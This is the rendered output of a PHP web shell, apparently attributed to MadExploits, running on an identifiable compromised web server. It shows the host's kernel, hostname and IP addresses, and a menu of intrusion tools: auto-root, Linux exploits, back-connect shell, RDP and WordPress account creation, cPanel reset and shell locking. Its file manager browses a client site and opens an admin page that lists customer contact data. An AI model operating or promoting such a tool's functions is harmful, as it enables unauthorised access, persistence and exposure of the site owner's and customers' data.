Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.128.168.176
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
pm
[ DIR ]
drwxr-xr-x
booking.php
3.04
KB
-rw-r--r--
contact-data.php
1.01
KB
-rw-r--r--
faq.php
12.51
KB
-rw-r--r--
index.php
11.14
KB
-rw-r--r--
login.php
1.63
KB
-rw-r--r--
logout.php
239
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact-data.php
<?php session_start(); require_once("pm/func.php"); if (!isset($_SESSION['user'])) { header("location: login.php"); } include("includes/header.php"); // print_r($_SESSION); ?> <section class="faq"> <div class="custom-container"> <div class="itgold-txt"> <h2 class="bm">Contact Data</h2> <p>Admin</p> <div class="line1"></div> </div> <div class="table-responsivev1"> <table id="myTable" class="display"> <thead> <tr> <th class="text-center">#</th> <th>Name</th> <th>Email</th> <th>Phone No</th> <!--<th>Location</th> <th>Service</th> <th>Date</th> --> </tr> </thead> <tbody> <?php fetchRecords(); ?> </tbody> </table> </div> </div> </section> <?php include("includes/footer.php"); ?>
Close